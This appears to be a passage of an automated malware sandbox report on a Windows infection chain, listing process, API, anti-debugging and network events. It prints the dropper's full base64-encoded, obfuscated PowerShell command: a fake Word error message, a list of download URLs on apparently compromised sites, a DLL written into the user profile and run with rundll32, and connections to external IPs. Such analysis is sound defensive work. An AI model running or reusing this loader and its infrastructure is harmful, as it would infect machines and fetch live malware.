File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5411

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 3403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 5411 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6476	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_10026EEF FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343109C FindFirstFileW,

Source: svchost.exe, 00000008.00000002.470041272.0000016077229000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW ?
Source: powershell.exe, 00000004.00000002.290693155.0000018A2C379000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWBW%SystemRoot%\system32\mswsock.dllAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQBy
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.471798450.000001607CA62000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000008.00000002.471730636.000001607CA4C000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.469952120.0000013F54829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000004.00000002.291408602.0000018A2C750000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.266721454.000001BB69A70000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.284405222.0000029CB6290000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.470431975.000001DF15C70000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_10001E91 Control_RunDLL,LoadLibraryA,LoadLibraryA,LoadLibraryA,_strlen,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,MessageBoxA,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_10026594 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100265D7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1002661A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001065E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_10026675 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1002673B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1002677F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100267C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100267F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BC4FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343C4FF mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_1000288D GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,und_memcpy,SetLastError,SetLastError,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 152.170.79.100 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 190.247.139.101 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 138.197.99.250 144

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnA